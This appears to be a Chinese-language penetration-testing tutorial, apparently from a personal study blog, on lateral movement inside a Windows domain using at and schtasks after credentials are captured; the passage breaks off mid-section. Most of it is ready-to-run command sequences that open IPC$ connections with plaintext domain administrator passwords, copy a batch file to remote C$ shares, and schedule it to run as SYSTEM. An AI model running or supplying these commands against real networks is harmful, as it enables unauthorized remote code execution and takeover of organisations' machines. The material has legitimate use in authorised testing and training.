域横向批量 at&schtasks&impacket
权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。
1.横向渗透—明文传递at&schtasks:
在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机?
这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
[at] & [schtasks]命令(利用点就是两者都是基于定时任务的攻击):
#at < Windows2012 成立条件
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务
#schtasks >=Windows2012 成立条件
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务,对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks